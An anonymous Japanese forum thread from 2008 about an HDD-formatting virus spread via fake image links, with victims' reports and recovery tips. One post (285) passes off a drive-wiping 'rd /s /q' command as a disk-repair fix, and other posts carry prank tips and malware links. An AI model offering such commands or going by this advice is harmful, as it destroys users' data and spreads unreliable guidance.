それにはコンピューターの管理からドライブのパスを変更しなくちゃいけないんだけど初心者じゃ無理だし。
262名無しさん@お腹いっぱい。:2008/01/03(木) 00:44:32
>>255
今からやってみます!
263名無しさん@お腹いっぱい。:2008/01/03(木) 00:46:38
>262
無事に帰還することを祈る。
264名無しさん@お腹いっぱい。:2008/01/03(木) 00:47:14
>>258
最初からその設定にしてるので隠しフォルダは見えてるんです。
C:\Documents and Settings\All Users\Application Data\
↑が隠しフォルダ
それ以降の\Microsoft\Internet Explorerは隠しフォルダじゃないはずなのにもともと存在しないという・・・
265名無しさん@お腹いっぱい。:2008/01/03(木) 00:47:33
(ウイルス感染確認方法)

http://www.google.co.jp/
↑すでにこのURLの色が変わっていたらアウト





おっとsageるの忘れたスマソ
266名無しさん@お腹いっぱい。:2008/01/03(木) 00:48:37
>>264
うちも今見てみたけどIEフォルダなし
気にしなくていいと思うよ
267名無しさん@お腹いっぱい。:2008/01/03(木) 00:59:48
>>263
どういう意味?
268名無しさん@お腹いっぱい。:2008/01/03(木) 01:01:34
1/3 0:54現在
http://www.virustotal.com/jp/analisis/1356327f99e9fd9f3fb225412a057430

あれ、対応8本から7本になってる
269名無しさん@お腹いっぱい。:2008/01/03(木) 01:03:56
>>256
ごーぐるは有名ですよねぇ
270名無しさん@お腹いっぱい。:2008/01/03(木) 01:05:25
>>264
自分のマシン調べてみたけど、どうも All Usersじゃなくて、各ユーザー毎の方か?(Wikiの間違い?)

ただ、自分のマシンで調べたところでは、このクイック起動の Quick Launch フォルダは、そのまんまスタートの横の
クイック起動のアイコンを示しているらしい。(このフォルダのアイコンを消すと、スタートの横のアイコンも消える)

だとすれば、とりあえず再起動時にクイック起動内のファイルが自動実行されることはないはずだから、
フォルダがなければ無視しても、とりあえず再起動に関しては大丈夫なはず。

はず、ばっかりで申し訳ないが、スタートアップとAUTOEXEC.BATを対処すれば、いけるんじゃないか?
あとは、とりあえずやること全部やったら、再起動時に画面を見ていて、フォーマットしそうになったら電源を切るくらいか。
271名無しさん@お腹いっぱい。:2008/01/03(木) 01:16:08
後ガセネタだろうとは思うけど、再起動時した後に.batが作り直された
という報告もあったな。再起動後も安心せずにスタートアップは電源切る前にチェックしとくこと。
272名無しさん@お腹いっぱい。:2008/01/03(木) 01:17:48
>>270
ほんとだ・・・各ユーザーのところに存在しやがった・・・orz
Wikiに追記したほうがいい気が・・・
273名無しさん@お腹いっぱい。:2008/01/03(木) 01:20:41
>>272
ミスw
フォルダはあって問題のファイルは無かったww
はやとちりスマソw
274名無しさん@お腹いっぱい。:2008/01/03(木) 01:27:45
>>255 の
>そしたら、テンキーの「*」を押すんだ

を試すと変なことになるな
275名無しさん@お腹いっぱい。:2008/01/03(木) 01:30:25
>>274
やったんですか?どうなりました?
276名無しさん@お腹いっぱい。:2008/01/03(木) 01:36:12
エクスプローラーが暴走する感じ
CPU使用率が100%くらいになってHDがガリガリ言い出す。
タスクマネージャーで見ると
マイコンピューター (応答なし)  の状態。

277名無しさん@お腹いっぱい。:2008/01/03(木) 01:39:48
愉快犯が混じっているから気をつけないと。
278名無しさん@お腹いっぱい。:2008/01/03(木) 01:41:26
>>276
電源切ってしばらくほっとけば問題ないんでしょうか>
279名無しさん@お腹いっぱい。:2008/01/03(木) 01:43:34
>>278
タスクマネージャーで「タスクの終了」で止めた。
慌ててると思わず再起動したくなるよ。

>>277の言うように愉快犯だと思う。
280名無しさん@お腹いっぱい。:2008/01/03(木) 01:46:50
>>279
報告ありがとうございます
281名無しさん@お腹いっぱい。:2008/01/03(木) 02:00:00
>>253 のニフティ ウィルスチェックってエンジン何使ってるのかな?
対応済みならいいけど・・
>>221によれば OneCareも対応済みとのことなので
http://onecare.live.com/site/ja-jp/center/howsafe.htm?s_cid=mscom_msrt

はどうかな?
282名無しさん@お腹いっぱい。:2008/01/03(木) 02:14:16
感染してるか調べる方法がいろいろあるようですが
どれがかくじつですか?
283名無しさん@お腹いっぱい。:2008/01/03(木) 02:15:56
ぶっちゃけ、買った時の状態に戻せばOK?
284名無しさん@お腹いっぱい。:2008/01/03(木) 02:18:09
Javascriptを無効にして重要なファイルを定期的にバックアップとっときゃ
怖いものはないでしょ
285名無しさん@お腹いっぱい。:2008/01/03(木) 02:26:13
>>282
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
286名無しさん@お腹いっぱい。:2008/01/03(木) 02:31:08
>>285
お前!
いい加減にしろよな!!
287名無しさん@お腹いっぱい。:2008/01/03(木) 02:34:52
>>285
見事に何も無くなりスッキリしますた!!
ありがとうございます!
288名無しさん@お腹いっぱい。:2008/01/03(木) 02:37:25
ファイルの検索でbatファイル検索すればいんじゃない?
289228:2008/01/03(木) 03:11:25
バックアップは大体完了。
あとは削除されても・・・まぁ・・・

とりあえずウィルススキャン終わったら再起動してどうなるかみます

でも、もしフォーマットされそうになって強制終了したところで、
次の一手はどうなるんだろうw
290名無しさん@お腹いっぱい。:2008/01/03(木) 03:17:29
>>289
セーフモードから削除
291名無しさん@お腹いっぱい。:2008/01/03(木) 03:28:47
これってさ、Dドライブから順にフォーマットしてくんですよね?
誤消去防止して物理的にフォーマットできなくしたメディアとかDドライブに入れといても
素通りしてE→F→Gって進んじゃうんですか?
292名無しさん@お腹いっぱい。:2008/01/03(木) 03:40:31
>>291
多分Dドライブどうにかしただけで終了
293228:2008/01/03(木) 03:48:23
>>290
なるほど・・・

ってかウィルススキャン未だに40%・・・
朝までかかるなぁ
294228:2008/01/03(木) 04:20:33
あれ、終わった。
では再起動してきます。生きていたら結果報告もしたいと思います
295名無しさん@お腹いっぱい。:2008/01/03(木) 04:22:40
>>294
ど、どう?
296名無しさん@お腹いっぱい。:2008/01/03(木) 04:26:28
wktk(AAry
297名無しさん@お腹いっぱい。:2008/01/03(木) 04:28:41
ワクワク(((;゚Д゚)))テカテカ
298名無しさん@お腹いっぱい。:2008/01/03(木) 04:40:16
まんまIEでavast突っ込んであるだけだけどもう大丈夫なの?
299名無しさん@お腹いっぱい。:2008/01/03(木) 04:52:54
>228オワタwwww
300名無しさん@お腹いっぱい。:2008/01/03(木) 05:01:10
再起動にしては時間がかかり過ぎてるねw
301名無しさん@お腹いっぱい。:2008/01/03(木) 05:03:41
もしかして脂肪しちゃった?w
302名無しさん@お腹いっぱい。:2008/01/03(木) 05:21:47
ttp://dangerous.org/virus-archives/troy.zip

俺これ踏んだけどどーすりゃいい?
303名無しさん@お腹いっぱい。:2008/01/03(木) 05:32:56
>>302
注意力を養うといいよ
304名無しさん@お腹いっぱい。:2008/01/03(木) 05:36:09
ちょっと寝ぼけててつい…

まずいかな?
305名無しさん@お腹いっぱい。:2008/01/03(木) 06:10:56
>>294
生きてる?
306228:2008/01/03(木) 06:19:10
うおおおお
こんなに期待されてるとは思わなかったw
結果はセーフでした!
期待にそぐわないですいませんw

詳しいスペック情報と行った対策っていりますかね?

時間かかったのは安全に起動したのを確認して飯食ってたからですw
307名無しさん@お腹いっぱい。:2008/01/03(木) 06:37:59
2時間も・・・

俺は寝る。
308名無しさん@お腹いっぱい。:2008/01/03(木) 06:50:32
食事は銃に弾を詰めるみたいなものだ、兵士は食べたくなくても食べなきゃいけない
309名無しさん@お腹いっぱい。:2008/01/03(木) 06:58:17
ウイルスとの戦いがまだまだ困難を極めるというときに、我々は、学ぶべき人を次々と失っていく…


寒い時代だと…思わんか?
310228:2008/01/03(木) 07:01:47
一応晒しておくとスペックはVAIOノートtypeF WindowsXP ウィルスソフトは更新切れのノートン使用
ぎぎぎでうpされてたファイル踏んで>>235のような状況。
まぁやったことといえば例のファイル削除と
OneCareでウィルススキャン(4個のファイルが見つかって削除・修復)

再起動後、一応ファイルが復元されてないかチェックしましたがありません。
ご教授してくださった方には感謝ですー
311名無しさん@お腹いっぱい。:2008/01/03(木) 07:06:44
>>310
ご苦労さんですた。良かったね! 忘れられない正月だなw
ま、ゆっくり休んでくれ
312228:2008/01/03(木) 07:12:22
でもインターネット徘徊だけでHDD全消去ってのは都市伝説だと思ってた・・・
プログラム詳しくないから分からんのだが
jpgにどうやってJavascriptとウィルスを組み込むんだろ?
jpgをメモ帳で開いてプログラム書き込めばできるのか・・・?
313名無しさん@お腹いっぱい。:2008/01/03(木) 07:16:41
JPGに偽装させたHTML/JSファイル
過去に、A.JPG .EXE
みたいなファイルもあったな
クリックしたらアボーンのやつね。
314名無しさん@お腹いっぱい。:2008/01/03(木) 07:24:09
>>310
これを機会にもっとセキュリティに気をつけような。
IE6よりIE7の方が安全性高いし、他にもファイアーフォックスとかIE系より頑強なブラウザもあるし。
更新切れのノートンなんてやめとけ。
金がないのならフリーのアンチウィルスソフトやらファイアーウォールやらもあるし。
315名無しさん@お腹いっぱい。:2008/01/03(木) 07:43:50
セキュリティのレベルを「高」にして、JacaScriptをオフっておけばおk?
ワケあって、IE6です。
316名無しさん@お腹いっぱい。:2008/01/03(木) 07:44:31
スマソ

x JacaScript
o JavaScript
317名無しさん@お腹いっぱい。:2008/01/03(木) 08:02:12
訳?割れもの?
318最強のWin2000:2008/01/03(木) 09:28:58
HDD_FORMAT_Virusを無理やり話題にしてるな。まあいいけどさ。
俺のIEのバージョンを確かめたら6だったよ。
元からIE7にするつもりも更々ないし、
元々IE6が大好きなんだよ俺は。
319名無しさん@お腹いっぱい。:2008/01/03(木) 09:32:49
ま、Virusじゃないけどな
320最強のWin2000:2008/01/03(木) 09:35:12
>>319
ネタの張本人現る(笑
321名無しさん@お腹いっぱい。:2008/01/03(木) 09:37:09
322最強のWin2000:2008/01/03(木) 09:40:35
>>321
わりぃ。俺の所からそれは見れないからパス。
323名無しさん@お腹いっぱい。:2008/01/03(木) 09:45:58
http://www.nih.go.jp/niid/virology2/HBV001.jpg

本物の木馬か鑑定よろしくおねがいします
324名無しさん@お腹いっぱい。:2008/01/03(木) 09:48:46
そろそろこういったのも魔女狩りされたほうがいい
325最強のWin2000:2008/01/03(木) 09:49:50
>>323
同じネタウイルスか(笑
326名無しさん@お腹いっぱい。:2008/01/03(木) 09:52:50
>>321
おk。
つーか俺、プニルだからなぁ。。。

>>323
細菌or酵母?
327最強のWin2000:2008/01/03(木) 09:52:58
321=323
ビンゴ!
328名無しさん@お腹いっぱい。:2008/01/03(木) 09:57:08
>>324
通報ってこと?
329最強のWin2000:2008/01/03(木) 09:58:10
>>1
ま、あれだ。
「他人の糞ドシで相撲をとる」厨ウイルスってやつだ
330名無しさん@お腹いっぱい。:2008/01/03(木) 10:00:25
定期的に見せしめは必要
331最強のWin2000:2008/01/03(木) 10:01:53
>>330
具体的に、誰にだ。
332名無しさん@お腹いっぱい。:2008/01/03(木) 10:05:21
>>331
画像掲示板も少々行き過ぎで連鎖でやられてたしな
知らないの?
ttp://gamushara.net/
333最強のWin2000:2008/01/03(木) 10:06:59
>>332
画像掲示板に興味ねえ
334名無しさん@お腹いっぱい。:2008/01/03(木) 10:08:48
ネット関係のガサ入れにうといな、コイツ
321も
335最強のWin2000:2008/01/03(木) 10:09:10
www.gigigiが廃したらしいな。
真実かどうかはどうでもいいが。
336名無しさん@お腹いっぱい。:2008/01/03(木) 10:09:32
何事もなさげにスレが消費されているけど
俺のカスペが>>321に反応するんだが・・
他の奴は何ともないのか?
337最強のWin2000:2008/01/03(木) 10:12:16
>>336
自分で貼ったリンクだろ(笑
338名無しさん@お腹いっぱい。:2008/01/03(木) 10:12:32
>>336
>>152-153の設定してる?
339名無しさん@お腹いっぱい。:2008/01/03(木) 10:15:48
>>338
Live!2chで見てるから>>152-153は関係ないと思う。
340最強のWin2000:2008/01/03(木) 10:15:51
「犯人」は必ず現場に戻ってくる

その犯人は腰抜けだった(笑
341名無しさん@お腹いっぱい。:2008/01/03(木) 10:15:53
ああゆうのって仮に連絡する場合ここでいいの?
他にどこにある?
ttp://www.internethotline.jp/
342最強のWin2000:2008/01/03(木) 10:19:06
>>341
インターネット・ホットラインセンターか
やっと自首するきになったか(笑
343名無しさん@お腹いっぱい。:2008/01/03(木) 10:21:55
>>340
おまえだろ、犯人


>>341
各社メーカーが対応しないストレスをどこに吐くかだよな
通報はロハだし新年見せしめ一号欲しいべ
344名無しさん@お腹いっぱい。:2008/01/03(木) 10:22:50
>>341
うーん、俺にはわからない。
すまん。
345341:2008/01/03(木) 10:24:41
こういうのもあった
ttp://www.npa.go.jp/cyber/soudan.htm
346最強のWin2000:2008/01/03(木) 10:25:15
>>343
罪を犯した者が、己が逃れるため他人を犯人扱いして逃げる。
やっぱり、腰抜けか(笑
347名無しさん@お腹いっぱい。:2008/01/03(木) 10:28:02
書き込み文を考えとくか
ひょうたんからコマで捕まるやつほど楽しいものはないw
348最強のWin2000:2008/01/03(木) 10:28:44
>>345
サイバー犯罪相談窓口は使えるのか(笑
使えるならここの 糞どしウイルス厨 を刑務所に入れてやれよ
349名無しさん@お腹いっぱい。:2008/01/03(木) 10:28:58
>>346
おまえも考えろよ
350最強のWin2000:2008/01/03(木) 10:30:40
>>349
お前と呼ぶな
最強のWin2000様と呼べ(笑
351名無しさん@お腹いっぱい。:2008/01/03(木) 10:37:16
>>348
>>349
ちなみに>>321もアウトの範疇なんだろ?
352名無しさん@お腹いっぱい。:2008/01/03(木) 10:39:33
>>351
厳密な話は向こうがやること
こっちは情報提供するだけ
353最強のWin2000:2008/01/03(木) 10:43:55
千葉か田舎だな(笑
354名無しさん@お腹いっぱい。:2008/01/03(木) 10:54:35
>>353
お上は身内には甘いが他人には手厳しいから一生懸命書けよ
なんにせよ遊び気分のやつも含めて元を断たねばならん
355最強のWin2000:2008/01/03(木) 10:59:05
>>354
元断ちか(笑

しかし他にもやり方はあるだろう
356名無しさん@お腹いっぱい。:2008/01/03(木) 11:00:24
今回の場合、被害にあったら
器物損壊(または精神的苦痛の障害罪)で刑事告訴したほうが良さそう

あと民事で損害賠償請求。

357最強のWin2000:2008/01/03(木) 11:03:36
10:43:55 〜このスレッド以外に書かれたスレ

avast! Anti-Virus Part81
188 :名無しさん@お腹いっぱい。:2008/01/03(木) 11:01:16
ちょっと質問。現在の最新バージョンって
- プログラム: 既に最新です
(現在のバージョン 4.7.1098)
- Vps: 既に最新です
(現在のバージョン 080101-0)
これでおk?
358名無しさん@お腹いっぱい。:2008/01/03(木) 11:04:37
これだな


コンピュータ若しくは電磁的記録を対象とした犯罪
電子計算機損壊等業務妨害罪、電子計算機使用詐欺罪等の刑法に規定されている犯罪のほか、ウイルスに感染したファイルを送って、コンピュータを正常に使用できない状態にした場合(器物損壊罪)などがあります。
コンピュータネットワークをその手段として利用した犯罪
電子掲示板を利用し、薬物等の違法な物品を販売する
インターネットに接続されたサーバコンピュータにわいせつな映像を置き、これを多くの人に対して閲覧させる
不正アクセス禁止法違反
コンピュータネットワーク上で他人の識別符号(ID、パスワード等)を無断で使用する
特殊な情報(クラッキングコード等)を入力し、他人のコンピュータへ侵入する
となります。
359名無しさん@お腹いっぱい。:2008/01/03(木) 11:06:00
>>356
thx
360名無しさん@お腹いっぱい。:2008/01/03(木) 11:09:16
誰かIPAには報告した?
でも明日からだな…
361最強のWin2000:2008/01/03(木) 11:12:02
「初」某国内掲示板に、糞どしウイルスを貼り付けた厨が逮捕される。他にも余罪あり(笑
362名無しさん@お腹いっぱい。:2008/01/03(木) 11:17:00
少なくとも身元特定されてブラックリスト入りになるといいな
>>358
thx
363最強のWin2000@XPに乗り換え:2008/01/03(木) 11:24:42
他スレッドの自作自演に篭ったか。
田舎者は腰抜けだった。(笑
364名無しさん@お腹いっぱい。:2008/01/03(木) 11:28:12
353 :最強のWin2000:2008/01/03(木) 10:43:55
千葉か田舎だな(笑

363 :最強のWin2000@XPに乗り換え:2008/01/03(木) 11:24:42
他スレッドの自作自演に篭ったか。
田舎者は腰抜けだった。(笑
365名無しさん@お腹いっぱい。:2008/01/03(木) 11:29:48 BE:1253298-PLT(12567)
いまだにIE6のヤツって割xp使ってるからだろw
366名無しさん@お腹いっぱい。:2008/01/03(木) 11:35:17
意味がわからん
367名無しさん@お腹いっぱい。:2008/01/03(木) 11:37:44
>>365
2kですが何か?
368名無しさん@お腹いっぱい。:2008/01/03(木) 11:45:55
面白がって貼った奴も同罪になるな
過失はないだろう。

369名無しさん@お腹いっぱい。:2008/01/03(木) 11:52:04
DOSコマンド厨もいい加減捕まって欲しい。

完全に悪意のあるやり方だし。
370名無しさん@お腹いっぱい。:2008/01/03(木) 12:00:28
FF3になったら導入してやってもいいけどいつ正式版が出るのか気になる
371名無しさん@お腹いっぱい。:2008/01/03(木) 12:01:17
サイバー犯罪調べてみたら
ttp://www.pref.toyama.jp/sections/6110/high-tech/cyber.html
県警では情報が多いな
372名無しさん@お腹いっぱい。:2008/01/03(木) 12:23:45
これから年度末に差し掛かるし数もこなして社会反響も考えたらこれ面白いんだけどな
373名無しさん@お腹いっぱい。:2008/01/03(木) 12:28:25
これって他国専用のHPも存在しているのか
374名無しさん@お腹いっぱい。:2008/01/03(木) 12:28:53
ちくり連中の仕事は前触れがない
少し楽しみが増えたw
375名無しさん@お腹いっぱい。:2008/01/03(木) 12:32:06
このブラクラが落とすBATファイルにAmiLaLaの名があって驚いたんだが何であまり騒がれてないんだ?
新参しかいないの?
376名無しさん@お腹いっぱい。:2008/01/03(木) 12:32:17
>>373
やるときは標的は国内も含めてALLで・・・
数打ちゃ当たるを祈願したいねw
めでてぇ
377名無しさん@お腹いっぱい。:2008/01/03(木) 12:33:58
頭いいやつは少なくとも国内サーバ使わないだろ
378名無しさん@お腹いっぱい。:2008/01/03(木) 12:36:05
>>375
国内外誰でもいいw
379名無しさん@お腹いっぱい。:2008/01/03(木) 13:10:10
筆ペンと封筒だと気持ちがこもってていいかな
さすがにスズリはないけどな
380名無しさん@お腹いっぱい。:2008/01/03(木) 13:13:11
書初めかよ
でも人迷惑は罰を受けてもしゃーないな
381名無しさん@お腹いっぱい。:2008/01/03(木) 13:30:24
コピペなら貼ってもいいみたいな風潮あるけどここらでひとつ決断が欲しいのは確か
じゃなきゃ風紀が保てなくなる
382名無しさん@お腹いっぱい。:2008/01/03(木) 13:36:26
>>379
陳情書で検索すれば作法がわかる
蛇足だったら悪いな
383名無しさん@お腹いっぱい。:2008/01/03(木) 13:48:55
すみません、感染してしまったんですがパソコンの知識が全くありません。 
中のデータだけでも守りたいのですが…
384名無しさん@お腹いっぱい。:2008/01/03(木) 13:53:44
どのスレのどこ
ちょうどその情報が欲しかったところ
385名無しさん@お腹いっぱい。:2008/01/03(木) 13:54:26
386名無しさん@お腹いっぱい。:2008/01/03(木) 14:02:08
全て消えました。 
データも何もかも。 
どうしたらいいですか? 
これから…
パソコンは使いたいのですが…


感染は少女漫画板のNANAスレです。 
現行の2つ前くらいです
387名無しさん@お腹いっぱい。:2008/01/03(木) 14:03:54
再起動してしまったのか
388名無しさん@お腹いっぱい。:2008/01/03(木) 14:05:39
デジタルデータの民事訴訟の損害賠償ってどれくらい取れるものなんかな?

389名無しさん@お腹いっぱい。:2008/01/03(木) 14:08:00
虚無感と脱力感で泣きたいです。 
なんとか普通に使えるように戻したいのですが…どうか助けて下さい。
390384:2008/01/03(木) 14:10:32
>>63>>321はどうなん?

>>386
ありがと。今月で●が切れる前でちょうどよかったわ。
391名無しさん@お腹いっぱい。:2008/01/03(木) 14:13:14
バスターは対応してないのかい?
392名無しさん@お腹いっぱい。:2008/01/03(木) 14:16:56
完全に逝ってしまいました。 
カスペアンチウィルス5でした。 
手の施しようがないのでデータは諦めようかと…
393名無しさん@お腹いっぱい。:2008/01/03(木) 14:21:01
ハードディスクフォーマットされた奴はバックアップとかとってないの?ないなら諦めろ。
大掃除だと思え。
あとはアミララを恨め
394名無しさん@お腹いっぱい。:2008/01/03(木) 14:21:45
>>388
金銭うんぬんより腹いせだわな
395名無しさん@お腹いっぱい。:2008/01/03(木) 14:25:08
諦めるな、まず被害届けの手続きしてきたほうがいい。
まずどこで感染したかとかもメモしておいた方がいい。

で警察署へ行って掲示板のリンクにアクセスしたらPCが壊されたと器物損壊で被害届け出してくる。

あとは警察にまかせるしかないけどね

PCは現状保存で
396名無しさん@お腹いっぱい。:2008/01/03(木) 14:25:30
>>393
バックアップありませんので諦めます。 
これからどうしたらいいでしょうか? 
初心者ですみません、教えて下さい…
397名無しさん@お腹いっぱい。:2008/01/03(木) 14:26:27
>>393
人ごと過ぎるし、俺は借りは返す主義。
398名無しさん@お腹いっぱい。:2008/01/03(木) 14:28:19
ボーッと見てたけど微妙に擁護してるやつって何?
399名無しさん@お腹いっぱい。:2008/01/03(木) 14:28:43
>>396
電源押すとWindows起動する?
400名無しさん@お腹いっぱい。:2008/01/03(木) 14:31:11
>>397
何するつもり?
アミララと対決?
401396:2008/01/03(木) 14:32:51
>>399 起動します 
ネットも見られます 
データは全部消えました 
書き込みはできません 
402名無しさん@お腹いっぱい。:2008/01/03(木) 14:33:30
>>398
少し後ろめたい事があるのだろう。俺はその人の気持ちを汲んで見逃さない。
403402:2008/01/03(木) 14:36:03
アミララと一緒に泥船に乗ってもらう
404名無しさん@お腹いっぱい。:2008/01/03(木) 14:36:10
ふむ・・・・何人釣れるかな
405名無しさん@お腹いっぱい。:2008/01/03(木) 14:36:40
>>401
HD全消去だったらwindowsも根こそぎアウトで
起動しないしネットも見れないんじゃないの?
406名無しさん@お腹いっぱい。:2008/01/03(木) 14:36:46
> 書き込みはできません 

???
407名無しさん@お腹いっぱい。:2008/01/03(木) 14:40:21
これってWindowsUpdateとかじゃ防げなかったわけ?
Exploitとかそんな複雑なものじゃないの?
408名無しさん@お腹いっぱい。:2008/01/03(木) 14:40:25
全部消えてから再起動していない…というか壊れている途中かもしれません 
今は携帯から書き込んでます
409名無しさん@お腹いっぱい。:2008/01/03(木) 14:43:16
>>408
なんかホワイターの可能性の方が多くない?
410名無しさん@お腹いっぱい。:2008/01/03(木) 14:43:35
>>408
あっちでも見かけたかもな
参考にさせてもらった
おれも同情節で参加させてもらうよ
411名無しさん@お腹いっぱい。:2008/01/03(木) 14:45:16
>>409
いつのマルウェアだボケ
412名無しさん@お腹いっぱい。:2008/01/03(木) 14:46:36
>>407
M$が放置プレーしてる
まだ数十件の放置プレーしてるよ。
多分2014年のXPサポート終了しても未修正の脆弱性は存在するだろうな

つまりあの企業体質を直さないと一緒無理

413名無しさん@お腹いっぱい。:2008/01/03(木) 14:47:02
ホワイターとは? 
無知ですみません。 
今から何をしたらいいでしょうか?
414名無しさん@お腹いっぱい。:2008/01/03(木) 14:47:16
陳情ネタにそのマルウェアの今昔関係ねーよ
はみ出したやつが負けw
415名無しさん@お腹いっぱい。:2008/01/03(木) 14:47:28
>>411
あっちだとまだ現役だぞ。
新製品が出るたびに検出報告がある。
416名無しさん@お腹いっぱい。:2008/01/03(木) 14:48:24
一緒
一生ね

|li _| ̄|○ il|
417名無しさん@お腹いっぱい。:2008/01/03(木) 14:48:57
自己責任の落ち度といえど訴えは余裕しゃくしゃく可能ってやつだわな
418名無しさん@お腹いっぱい。:2008/01/03(木) 14:51:29
>>413
とりあえず警察行って被害届け

PCはそのまま現状保存しておかないといけない
(証拠保存)

419名無しさん@お腹いっぱい。:2008/01/03(木) 14:52:53
お前ら誰と戦う気でいるの?www
もうアホかと・・・
420名無しさん@お腹いっぱい。:2008/01/03(木) 14:55:01
>>419
おまえ邪魔
421名無しさん@お腹いっぱい。:2008/01/03(木) 14:55:18
当のスレに仕掛けた本人ご降臨。>>419
422名無しさん@お腹いっぱい。:2008/01/03(木) 14:55:20
ウイルスURLをコピペした奴にも責任はあるからな
423名無しさん@お腹いっぱい。:2008/01/03(木) 14:57:07
>>413
とりあえずリカバリーしろ。
そうすれば全て解決
424名無しさん@お腹いっぱい。:2008/01/03(木) 14:58:44
待て、リカバリーしたら証拠なくなるだろ
425名無しさん@お腹いっぱい。:2008/01/03(木) 14:58:45
言いたくはなかったけどWiki作ったやつ知識乏しすぎ
わきまえろって感じ
素人の鵜呑みの責任取れるのかよ
それこそ同罪
426名無しさん@お腹いっぱい。:2008/01/03(木) 15:00:51
ウィルスリンク張りまくっておとがめ無しっておかしくね?

>>425
気持ちは察する
427名無しさん@お腹いっぱい。:2008/01/03(木) 15:01:32
>>424
>>423は証拠隠滅したがってる(させたがってる)んじゃないかな?
428名無しさん@お腹いっぱい。:2008/01/03(木) 15:03:56
ウイルスURL貼る

ここ

ウイルスだと知って貼っているかがポイントだな。

知っていればもう器物損壊
知らなくても過失は問われるし
民事だと過失でも損害賠償責任はあるからな。

429名無しさん@お腹いっぱい。:2008/01/03(木) 15:05:02
だから誰と戦うんだよwwwお前らキレ杉w
被害者のパソコンを正常に戻すのが先決だと俺は思うんだけど
これって間違ってるの?
430名無しさん@お腹いっぱい。:2008/01/03(木) 15:05:47
>>427
そんな雰囲気有りげ


幼稚なやつには制裁が必要だよ
手加減してブラクラ止まりだったのに最近は目に余る
431名無しさん@お腹いっぱい。:2008/01/03(木) 15:06:53
>>429
なぜそこまで必死になる?
432名無しさん@お腹いっぱい。:2008/01/03(木) 15:06:56
>>429
邪魔
臭いメシ食いたくないのはわかるけど
433名無しさん@お腹いっぱい。:2008/01/03(木) 15:09:05
幼稚な頭の2chだから平気とかは終わりにさせたいね
434名無しさん@お腹いっぱい。:2008/01/03(木) 15:09:14
過去に逮捕者が出てる犯罪予告カキコ以上に
実際の被害が出てるわけだしなぁ…

実際に突き止められるかはともかく警察に…は間違ってないとは思う
435名無しさん@お腹いっぱい。:2008/01/03(木) 15:10:07
キメェスレだなw
正義のヒーロー気取りばっかw
アミララ捕まればいいねwwwwおまいらの行動力に期待w
436名無しさん@お腹いっぱい。:2008/01/03(木) 15:13:07
> 実際に突き止められるかはともかく警察に…は間違ってないとは思う

当たり前だよね
泣き寝入りはPCが浸透する前までの風潮
もう時代が違う
437名無しさん@お腹いっぱい。:2008/01/03(木) 15:13:15
>>435
挙動不審になってきてるようだが?大丈夫か?

人間追い詰められると冷静さを失うからな。
438435:2008/01/03(木) 15:16:09
>>437
山田ウイルスとか散々性質の悪いのが今まであったのに今回のこの
空気に戸惑ってるだけだ。
439名無しさん@お腹いっぱい。:2008/01/03(木) 15:17:17
やる以上はリスク背負わないとな。
結果、理不尽でもいいから晒し上げられる人間が必要。
440名無しさん@お腹いっぱい。:2008/01/03(木) 15:21:25
ぐぐってみたけどアミララってかつて猛威を振るったウイルスなんだな。
当時の記事とか見てるとやはりノートンが対応してなくてワロタwww
今も昔も対応の遅さは全然変わってないのな
441名無しさん@お腹いっぱい。:2008/01/03(木) 15:24:57
結局セキュホをついたものなのかはっきりしてほしい
442名無しさん@お腹いっぱい。:2008/01/03(木) 15:25:41
そうだ、誰か運営に言ってスレ保存してもらうといいよ
警察に被害届出すっていえばいい
443名無しさん@お腹いっぱい。:2008/01/03(木) 15:28:08
もし検挙されてまだ残り半生があるようなやつだったらスカッとするだろうなあ
ここ最近いい加減うざかったからなあ
444名無しさん@お腹いっぱい。:2008/01/03(木) 15:30:04
>>442
そうしとこうかな

>>443
セキュ板住人でもそう思うの?
445名無しさん@お腹いっぱい。:2008/01/03(木) 15:31:30
相談者置いてけぼりだな。
446名無しさん@お腹いっぱい。:2008/01/03(木) 15:31:58
>>443
>ここ最近いい加減うざかったからなあ
誰?
447名無しさん@お腹いっぱい。:2008/01/03(木) 15:35:03
>>444
趣味でもないしこれでメシ食ってるわけでもないし
448名無しさん@お腹いっぱい。:2008/01/03(木) 15:35:57
449名無しさん@お腹いっぱい。:2008/01/03(木) 15:37:59
448の人間は俺のリスト入り
450名無しさん@お腹いっぱい。:2008/01/03(木) 15:41:10
だれかWindowsUpdate最新状態で>>448の今回のウイルス(だよね?)踏んだ奴いる?
これでbatファイルが落とされればexploitついてるってことになるよな?
451名無しさん@お腹いっぱい。:2008/01/03(木) 15:41:57
俺も2ch関係の事で橋本弁護士にログ提出した事あったな
452名無しさん@お腹いっぱい。:2008/01/03(木) 15:43:54
>>450
そうだね
通報しても裁定はキミがするわけじゃないからね
453名無しさん@お腹いっぱい。:2008/01/03(木) 15:44:53
惜しい
橋下
454名無しさん@お腹いっぱい。:2008/01/03(木) 15:49:09
>>451
正確に書くと提出する時のログに残るから良かったね
455名無しさん@お腹いっぱい。:2008/01/03(木) 15:50:50
喜ぶところかそれ
456名無しさん@お腹いっぱい。:2008/01/03(木) 15:56:22
wktk
457名無しさん@お腹いっぱい。:2008/01/03(木) 16:02:55
定期age
458名無しさん@お腹いっぱい。:2008/01/03(木) 17:27:43
(・3・) エェー 時事的に頻繁定期ageだNE!
459名無しさん@お腹いっぱい。:2008/01/03(木) 17:51:59
なにげに>>115が最強の対策法じゃね?
460名無しさん@お腹いっぱい。:2008/01/03(木) 17:52:28
市況2にウイルス貼られて、jpg踏んだらipとクリップボードの内容抜かれたって
言われたんだけど、どういう種類のウイルス?ヤヴァイ?
461228:2008/01/03(木) 17:56:43
俺が踏んだやつはまだましなのか・・・
気をつけねば

format.comはリネームしておいてる
462名無しさん@お腹いっぱい。:2008/01/03(木) 18:40:38
>>460
死ぬほどやばい。やばいから質問スレへ池。
463名無しさん@お腹いっぱい。:2008/01/03(木) 19:19:12
もうどうしたらいいかワカラン。
464名無しさん@お腹いっぱい。:2008/01/03(木) 19:24:30
フルスキャン
465名無しさん@お腹いっぱい。:2008/01/03(木) 19:33:00


現段階の各社の対応情況どうなのよ?
466名無しさん@お腹いっぱい。:2008/01/03(木) 19:37:43
つーか、スレを開いただけなら無問題なの?
